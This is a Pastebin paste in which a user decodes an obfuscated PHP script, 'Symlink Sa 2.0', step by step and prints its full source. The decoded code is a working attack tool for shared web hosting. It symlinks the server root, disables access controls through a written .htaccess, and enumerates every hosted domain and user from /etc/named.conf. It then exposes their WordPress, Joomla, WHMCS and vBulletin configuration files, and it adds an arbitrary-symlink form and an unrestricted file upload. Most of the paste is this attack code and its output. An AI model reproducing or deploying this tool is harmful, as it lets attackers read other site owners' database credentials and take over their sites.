API tools faq
paste
Advertisement
CyberDarx

Symlnk SA 2.0 Decoded

CyberDarx
Apr 29th, 2013
97
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 14.83 KB | None | 0 0
raw download clone embed print report
  1.     # For MuslimHacker: Great and Good Job. I am sorry for decoding your encoded script. But we need to learn more and more.  
  2.    #
  3.    # Encoded script in section 4.
  4.    #
  5.    # Saturday, Apr 14th, 2012 11:18PM
  6.    
  7.     array@xcrew:~/data/xterm/lab/decode$ ls
  8.     embuh2.php  embuh.php
  9.     array@xcrew:~/data/xterm/lab/decode$ ls -la
  10.     total 320
  11.     drwxr-xr-x  3 array array 65536 2012-04-14 23:08 .
  12.     drwxr-xr-x 24 array array 65536 2012-04-14 22:57 ..
  13.     -rwxr-xr-x  1 array array 13640 2012-04-14 22:58 embuh2.php
  14.     -rwxr-xr-x  1 array array 14236 2012-04-14 23:08 embuh.php
  15.      
  16.     array@xcrew:~/data/xterm/lab/decode$
  17.      
  18.     ===== 1st decode ======
  19.     array@xcrew:~/data/xterm/lab/decode$ php -q embuh.php
  20.     $O000O0O00=$OOO000O00($OOO0O0O00,'rb');$O0O00OO00($O000O0O00,0x49f);$OO00O00O0=$OOO0000O0($OOO00000O($O0O00OO00($O000O0O00,0x17c),'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'));eval($OO00O00O0);array@xcrew:~/data/xterm/lab/decode$
  21.      
  22.     ===== 2nd decode =====
  23.     array@xcrew:~/data/xterm/lab/decode$ php -q embuh.php
  24.     $OO00O00O0=str_replace('__FILE__',"'".$OOO0O0O00."'",$OOO0000O0($OOO00000O($O0O00OO00($O000O0O00,$OO00O0000),'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));fclose($O000O0O00);eval($OO00O00O0);array@xcrew:~/data/xterm/lab/decode$
  25.      
  26.     ===== 3rd test -> the output =====
  27.     array@xcrew:~/data/xterm/lab/decode$ php -q embuh.php
  28.        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  29.         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  30.      
  31.     <html xmlns="http://www.w3.org/1999/xhtml">
  32.      
  33.     <head>
  34.     <title>Symlink_Sa 2.0</title>
  35.      
  36.     <style type="text/css">
  37.      
  38.       html,body {
  39.          margin: 0;
  40.          padding: 0;
  41.          outline: 0;
  42.     }
  43.      
  44.      
  45.     body {
  46.         direction: ltr;
  47.         background-color:#F4F4F4;
  48.            color: rgb(153, 153, 153);
  49.         text-align: center
  50.     }
  51.      
  52.     input,textarea,select{
  53.     font-weight: bold;
  54.     color: #111111;
  55.    dashed #ffffff;
  56.    border: 1px
  57.     solid #BBBBBB;
  58.    background-color: #DDDDDD;
  59.    }
  60.      
  61.      
  62.     .hedr {
  63.       font-family: Tahoma, Arial, sans-serif  ;
  64.       font-size: 22px;
  65.      
  66.      
  67.     }
  68.      
  69.     .cont a{
  70.      
  71.      text-decoration: none;
  72.      color:rgb(153, 153, 153);
  73.      font-family: Tahoma, Arial, sans-serif  ;
  74.      font-size: 16px;
  75.      text-shadow: 0px 0px 3px ;
  76.     }
  77.      
  78.     .cont a:hover{
  79.      
  80.      
  81.       color: #EEEEEE ;
  82.      text-shadow:0px 0px 3px #000000 ;
  83.    
  84.      
  85.     }
  86.      
  87.     .tmp tr td{
  88.      
  89.     border: solid 1px #BBBBBB;
  90.    
  91.     padding: 2px ;
  92.       font-size: 13px;
  93.     }
  94.      
  95.     .tmp tr td a {
  96.       text-decoration: none;
  97.      
  98.      
  99.      
  100.     }
  101.      
  102.     .foter{
  103.       font-size: 9pt;
  104.       color: #AAAAAA ;
  105.      text-align: center
  106.     }
  107.      
  108.     .tmp tr td:hover{
  109.      
  110.     box-shadow: 0px 0px 4px #888888;
  111.    
  112.     }
  113.     .fot{
  114.      
  115.     font-family:Tahoma, Arial, sans-serif;
  116.      
  117.       font-size: 13pt;
  118.     }
  119.      
  120.     .ir {
  121.       color: #FF0000;
  122.    }
  123.      
  124.      
  125.      
  126.     </style>
  127.      
  128.     </head>
  129.      
  130.     <body>
  131.      
  132.     <div class='all'>
  133.      
  134.      
  135.     <br /><div class="hedr"> Symlink Sa 2.0 <br /></div><br /><div class="hedr">-:[ User & Domains & Symlink ]:-<br /><br /></div><div class="cont">
  136.      
  137.     [<a href="?"> Home </a>]
  138.      
  139.     [<a href="?sws=sym"> User & Domains & Symlink </a>]
  140.      
  141.     [<a href="?sws=sec"> Domains & Script </a>]
  142.      
  143.     [ <a href="?sws=file"> Symlink File </a>]<br /><br /><br />
  144.      
  145.      
  146.      
  147.      
  148.      
  149.      
  150.     </div><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>
  151.     <br /><br /><div class="fot">Cod3d by Mr.Alsa3ek and Al-Swisre
  152.     <br /><br />
  153.     Muslims Hackers</div>
  154.      
  155.     </div>
  156.      
  157.      
  158.     </body>
  159.      
  160.     </html>
  161.      
  162.      
  163.     ===== 4th decode (and the last) -> the source code ====
  164.      
  165.     array@xcrew:~/data/xterm/lab/decode$ php -q embuh.php
  166.     echo ' ';
  167.     @set_time_limit(0);
  168.     $IIIIIIIIIIIl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
  169.     $IIIIIIIIIII1=explode('/',$IIIIIIIIIIIl );
  170.     $IIIIIIIIIIIl =str_replace($IIIIIIIIIII1[count($IIIIIIIIIII1)-1],'',$IIIIIIIIIIIl );
  171.     ;echo '  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  172.        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  173.    
  174.    <html xmlns="http://www.w3.org/1999/xhtml">
  175.    
  176.    <head>
  177.    <title>Symlink_Sa 2.0</title>
  178.    
  179.    <style type="text/css">
  180.    
  181.      html,body {
  182.         margin: 0;
  183.         padding: 0;
  184.         outline: 0;
  185.    }
  186.    
  187.    
  188.    body {
  189.        direction: ltr;
  190.        background-color:#F4F4F4;
  191.            color: rgb(153, 153, 153);
  192.        text-align: center
  193.    }
  194.    
  195.    input,textarea,select{
  196.    font-weight: bold;
  197.    color: #111111;
  198.    dashed #ffffff;
  199.    border: 1px
  200.    solid #BBBBBB;
  201.    background-color: #DDDDDD;
  202.    }
  203.    
  204.    
  205.    .hedr {
  206.      font-family: Tahoma, Arial, sans-serif  ;
  207.      font-size: 22px;
  208.    
  209.    
  210.    }
  211.    
  212.    .cont a{
  213.    
  214.     text-decoration: none;
  215.     color:rgb(153, 153, 153);
  216.     font-family: Tahoma, Arial, sans-serif  ;
  217.     font-size: 16px;
  218.     text-shadow: 0px 0px 3px ;
  219.    }
  220.    
  221.    .cont a:hover{
  222.    
  223.    
  224.      color: #EEEEEE ;
  225.      text-shadow:0px 0px 3px #000000 ;
  226.    
  227.    
  228.    }
  229.    
  230.    .tmp tr td{
  231.    
  232.    border: solid 1px #BBBBBB;
  233.    
  234.    padding: 2px ;
  235.      font-size: 13px;
  236.    }
  237.    
  238.    .tmp tr td a {
  239.      text-decoration: none;
  240.    
  241.    
  242.    
  243.    }
  244.    
  245.    .foter{
  246.      font-size: 9pt;
  247.      color: #AAAAAA ;
  248.      text-align: center
  249.    }
  250.    
  251.    .tmp tr td:hover{
  252.    
  253.    box-shadow: 0px 0px 4px #888888;
  254.    
  255.    }
  256.    .fot{
  257.    
  258.    font-family:Tahoma, Arial, sans-serif;
  259.    
  260.      font-size: 13pt;
  261.    }
  262.    
  263.    .ir {
  264.      color: #FF0000;
  265.    }
  266.    
  267.    
  268.    
  269.    </style>
  270.    
  271.    </head>
  272.    
  273.    <body>
  274.    
  275.    <div class=\'all\'>
  276.    
  277.    
  278.    ';
  279.     @mkdir('sym',0777);
  280.     $IIIIIIIIIIl1  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  281.     $IIIIIIIIII1I =@fopen ('sym/.htaccess','w');
  282.     fwrite($IIIIIIIIII1I ,$IIIIIIIIIIl1);
  283.     @symlink('/','sym/root');
  284.     $IIIIIIIIIlIl = basename(__FILE__);
  285.     echo '<br /><div class="hedr"> Symlink Sa 2.0 <br /></div>';
  286.     echo '<br /><div class="hedr">-:[ User & Domains & Symlink ]:-<br /><br /></div>';
  287.     echo '<div class="cont">
  288.    
  289.    [<a href="?"> Home </a>]
  290.    
  291.    [<a href="?sws=sym"> User & Domains & Symlink </a>]
  292.    
  293.    [<a href="?sws=sec"> Domains & Script </a>]
  294.    
  295.    [ <a href="?sws=file"> Symlink File </a>]<br /><br /><br />
  296.    
  297.    
  298.    
  299.    
  300.    
  301.    
  302.    </div>';
  303.     if(isset($_REQUEST['sws']))
  304.     {
  305.     switch ($_REQUEST['sws'])
  306.     {
  307.     case 'sec':
  308.     $IIIIIIIIIllI = @file('/etc/named.conf');
  309.     if(!$IIIIIIIIIllI)
  310.     {
  311.     die (" can't read /etc/named.conf");
  312.     }
  313.     else
  314.     {
  315.     echo "<div class='tmp'>
  316.    <table align='center' width='40%'><td> Domains </td><td> Script </td>";
  317.     foreach($IIIIIIIIIllI as $IIIIIIIIIll1){
  318.     if(eregi('zone',$IIIIIIIIIll1)){
  319.     preg_match_all('#zone "(.*)"#',$IIIIIIIIIll1,$IIIIIIIIIl11);
  320.     flush();
  321.     if(strlen(trim($IIIIIIIIIl11[1][0])) >2){
  322.     $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIIIIIl11[1][0]));
  323.     $IIIIIIIII1l1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/wp-config.php';
  324.     $IIIIIIIII11I=get_headers($IIIIIIIII1l1);
  325.     $IIIIIIIII11l=$IIIIIIIII11I[0];
  326.     $IIIIIIIII111=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/blog/wp-config.php';
  327.     $IIIIIIIIlIII=get_headers($IIIIIIIII111);
  328.     $IIIIIIIIlIIl=$IIIIIIIIlIII[0];
  329.     $IIIIIIIIlII1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/configuration.php';
  330.     $IIIIIIIIlIlI=get_headers($IIIIIIIIlII1);
  331.     $IIIIIIIIlIll=$IIIIIIIIlIlI[0];
  332.     $IIIIIIIIlIl1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/joomla/configuration.php';
  333.     $IIIIIIIIlI1I=get_headers($IIIIIIIIlIl1);
  334.     $IIIIIIIIlI1l=$IIIIIIIIlI1I[0];
  335.     $IIIIIIIIlI11=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/includes/config.php';
  336.     $IIIIIIIIllII=get_headers($IIIIIIIIlI11);
  337.     $IIIIIIIIllIl=$IIIIIIIIllII[0];
  338.     $IIIIIIIIllI1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/vb/includes/config.php';
  339.     $IIIIIIIIlllI=get_headers($IIIIIIIIllI1);
  340.     $IIIIIIIIllll=$IIIIIIIIlllI[0];
  341.     $IIIIIIIIlll1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/forum/includes/config.php';
  342.     $IIIIIIIIll1I=get_headers($IIIIIIIIlll1);
  343.     $IIIIIIIIll1l=$IIIIIIIIll1I[0];
  344.     $IIIIIIIIll11=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'public_html/clients/configuration.php';
  345.     $IIIIIIIIl1II=get_headers($IIIIIIIIll11);
  346.     $IIIIIIIIl1Il=$IIIIIIIIl1II[0];
  347.     $IIIIIIIIl1I1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/support/configuration.php';
  348.     $IIIIIIIIl1II=get_headers($IIIIIIIIl1I1);
  349.     $IIIIIIIIl1lI=$IIIIIIIIl1II[0];
  350.     $IIIIIIIIl1ll=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/client/configuration.php';
  351.     $IIIIIIIIl1l1=get_headers($IIIIIIIIl1ll);
  352.     $IIIIIIIIl11I=$IIIIIIIIl1l1[0];
  353.     $IIIIIIIIl11l=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/submitticket.php';
  354.     $IIIIIIIIl111=get_headers($IIIIIIIIl11l);
  355.     $IIIIIIII1III=$IIIIIIIIl111[0];
  356.     $IIIIIIII1IIl=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/client/configuration.php';
  357.     $IIIIIIII1II1=get_headers($IIIIIIII1IIl);
  358.     $IIIIIIII1IlI=$IIIIIIII1II1[0];
  359.     $IIIIIIII1Ill = strpos($IIIIIIIII11l,'200');
  360.     $IIIIIIII1I1I='&nbsp;';
  361.     if (strpos($IIIIIIIII11l,'200') == true )
  362.     {
  363.     $IIIIIIII1I1I="<a href='".$IIIIIIIII1l1."' target='_blank'>Wordpress</a>";
  364.     }
  365.     elseif (strpos($IIIIIIIIlIIl,'200') == true)
  366.     {
  367.     $IIIIIIII1I1I="<a href='".$IIIIIIIII111."' target='_blank'>Wordpress</a>";
  368.     }
  369.     elseif (strpos($IIIIIIIIlIll,'200')  == true and strpos($IIIIIIII1III,'200')  == true )
  370.     {
  371.     $IIIIIIII1I1I=" <a href='".$IIIIIIIIl11l."' target='_blank'>WHMCS</a>";
  372.     }
  373.     elseif (strpos($IIIIIIIIl1lI,'200')  == true)
  374.     {
  375.     $IIIIIIII1I1I =" <a href='".$IIIIIIIIl1I1."' target='_blank'>WHMCS</a>";
  376.     }
  377.     elseif (strpos($IIIIIIIIl11I,'200')  == true)
  378.     {
  379.     $IIIIIIII1I1I =" <a href='".$IIIIIIIIl1ll."' target='_blank'>WHMCS</a>";
  380.     }
  381.     elseif (strpos($IIIIIIIIlIll,'200')  == true)
  382.     {
  383.     $IIIIIIII1I1I=" <a href='".$IIIIIIIIlII1."' target='_blank'>Joomla</a>";
  384.     }
  385.     elseif (strpos($IIIIIIIIlI1l,'200')  == true)
  386.     {
  387.     $IIIIIIII1I1I=" <a href='".$IIIIIIIIlIl1."' target='_blank'>Joomla</a>";
  388.     }
  389.     elseif (strpos($IIIIIIIIllIl,'200')  == true)
  390.     {
  391.     $IIIIIIII1I1I=" <a href='".$IIIIIIIIlI11."' target='_blank'>vBulletin</a>";
  392.     }
  393.     elseif (strpos($IIIIIIIIllll,'200')  == true)
  394.     {
  395.     $IIIIIIII1I1I=" <a href='".$IIIIIIIIllI1."' target='_blank'>vBulletin</a>";
  396.     }
  397.     elseif (strpos($IIIIIIIIll1l,'200')  == true)
  398.     {
  399.     $IIIIIIII1I1I=" <a href='".$IIIIIIIIlll1."' target='_blank'>vBulletin</a>";
  400.     }
  401.     else
  402.     {
  403.     continue;
  404.     }
  405.     $IIIIIIII1I1l = $IIIIIIIII1I1['name'] ;
  406.     echo '<tr><td><a href=http://www.'.$IIIIIIIIIl11[1][0].'/>'.$IIIIIIIIIl11[1][0].'</a></td>
  407.    <td>'.$IIIIIIII1I1I.'</td></tr>';flush();
  408.     }
  409.     }
  410.     }
  411.     }
  412.     break;
  413.     case 'sym':
  414.     $IIIIIIIIIllI = @file('/etc/named.conf');
  415.     if(!$IIIIIIIIIllI)
  416.     {
  417.     die (" can't read /etc/named.conf");
  418.     }
  419.     else
  420.     {
  421.     echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
  422.     foreach($IIIIIIIIIllI as $IIIIIIIIIll1){
  423.     if(eregi('zone',$IIIIIIIIIll1)){
  424.     preg_match_all('#zone "(.*)"#',$IIIIIIIIIll1,$IIIIIIIIIl11);
  425.     flush();
  426.     if(strlen(trim($IIIIIIIIIl11[1][0])) >2){
  427.     $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIIIIIl11[1][0]));
  428.     $IIIIIIII1I1l = $IIIIIIIII1I1['name'] ;
  429.     @symlink('/','sym/root');
  430.     $IIIIIIII1I1l = $IIIIIIIIIl11[1][0];
  431.     $IIIIIIII1I11 = '\.ir';
  432.     $IIIIIIII1lII = '\.il';
  433.     if (eregi("$IIIIIIII1I11",$IIIIIIIIIl11[1][0]) or eregi("$IIIIIIII1lII",$IIIIIIIIIl11[1][0]) )
  434.     {
  435.     $IIIIIIII1I1l = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$IIIIIIIIIl11[1][0].'</div>';
  436.     }
  437.     echo "
  438.    <tr>
  439.    
  440.    <td>
  441.    <div class='dom'><a target='_blank' href=http://www.".$IIIIIIIIIl11[1][0].'/>'.$IIIIIIII1I1l.' </a> </div>
  442.    </td>
  443.    
  444.    
  445.    <td>
  446.    '.$IIIIIIIII1I1['name']."
  447.    </td>
  448.    
  449.    
  450.    
  451.    
  452.    
  453.    
  454.    <td>
  455.    <a href='sym/root/home/".$IIIIIIIII1I1['name']."/public_html' target='_blank'>symlink </a>
  456.    </td>
  457.    
  458.    
  459.    </tr></div> ";
  460.     flush();
  461.     }
  462.     }
  463.     }
  464.     }
  465.     break;
  466.     case 'file':
  467.     echo '
  468.    The file path to symlink
  469.    
  470.    <br /><br />
  471.    <form method="post">
  472.    <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
  473.    <input type="text" name="symfile" value="file.name_sym ( Ex. :: 1.txt )" size="60"/><br /><br />
  474.    <input type="submit" value="symlink" name="symlink" /> <br /><br />
  475.    
  476.    
  477.    
  478.    </form>
  479.    ';
  480.     $IIIIIIII1lIl = $_POST['file'];
  481.     $symfile = $_POST['symfile'];
  482.     $symlink = $_POST['symlink'];
  483.     if ($symlink)
  484.     {
  485.     @symlink("$IIIIIIII1lIl","sym/$symfile");
  486.     echo '<br /><a target="_blank" href="sym/'.$symfile.'" >'.$symfile.'</a>';
  487.     }
  488.     break;
  489.     default:
  490.     header("Location: $IIIIIIIIIlIl");
  491.     }
  492.     }else
  493.     {
  494.     echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  495.     echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  496.     if( $_POST['_upl'] == 'Upload') {
  497.     if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])) {echo '<br /><br /><b>Uploaded successful !!<br><br>';}
  498.     else {echo '<br /><br />Not uploaded !!<br><br>';}
  499.     }
  500.     echo '
  501.    <br /><br /><div class="fot">Cod3d by Mr.Alsa3ek and Al-Swisre
  502.    <br /><br />
  503.    Muslims Hackers</div> ';
  504.     }
  505.     ;echo '
  506.    
  507.    </div>
  508.    
  509.    
  510.    </body>
  511.    
  512.    </html>
  513.    ';
  514.      
  515.     array@xcrew:~/data/xterm/lab/decode$
  516.      
  517.     ========
  518.      
  519.     ./XterM - ExploreCrew.Org
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!